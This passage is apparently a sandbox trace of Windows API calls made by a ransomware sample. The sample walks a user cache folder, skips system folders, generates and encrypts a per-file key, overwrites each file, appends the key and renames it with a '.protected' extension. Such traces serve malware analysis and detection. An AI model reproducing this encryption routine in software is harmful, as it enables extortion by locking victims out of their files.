lpString2="$Recycle.bin") returned 1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="System Volume Information") returned -1 [0089.130] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.130] StrStrIW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".protected") returned 0x0 [0089.130] lstrcmpW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="RESTORE_FILES.txt") returned -1 [0089.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0089.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".rar") returned 0x0 [0089.131] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".zip") returned 0x0 [0089.131] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ec, lpOverlapped=0x0) returned 1 [0089.132] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ec, lpOverlapped=0x0) returned 1 [0089.132] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.132] CloseHandle (hObject=0x150) returned 1 [0089.132] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected") returned 162 [0089.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.protected")) returned 1 [0089.133] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Windows") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files (x86)") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="$Recycle.bin") returned 1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="System Volume Information") returned -1 [0089.133] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.133] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".protected") returned 0x0 [0089.133] lstrcmpW 
(lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="RESTORE_FILES.txt") returned -1 [0089.133] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.133] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".rar") returned 0x0 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".zip") returned 0x0 [0089.134] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.134] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.134] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.135] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.135] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.135] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.135] CloseHandle (hObject=0x150) returned 1 [0089.135] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected") returned 162 [0089.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.protected")) returned 1 [0089.135] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Windows") returned -1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files") returned -1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files (x86)") returned -1 [0089.136] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="$Recycle.bin") returned 1 [0089.136] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="System Volume Information") returned -1 [0089.136] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".protected") returned 0x0 [0089.136] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="RESTORE_FILES.txt") returned -1 [0089.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0089.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".rar") returned 0x0 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".zip") returned 0x0 [0089.136] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.137] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.137] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.138] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.138] CloseHandle (hObject=0x150) returned 1 [0089.138] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected") returned 162 [0089.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.protected")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Windows") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files (x86)") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="$Recycle.bin") returned 1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="System Volume Information") returned -1 [0089.138] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".protected") returned 0x0 [0089.139] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="RESTORE_FILES.txt") returned -1 [0089.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".rar") returned 0x0 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".zip") returned 0x0 [0089.139] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.169] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.170] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.170] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.170] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.170] CloseHandle (hObject=0x150) returned 1 [0089.170] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected") returned 162 [0089.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.protected")) returned 1 [0089.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Windows") returned -1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files") returned -1 [0089.171] lstrcmpiW 
(lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files (x86)") returned -1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="$Recycle.bin") returned 1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="System Volume Information") returned -1 [0089.171] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.171] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".protected") returned 0x0 [0089.171] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="RESTORE_FILES.txt") returned -1 [0089.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 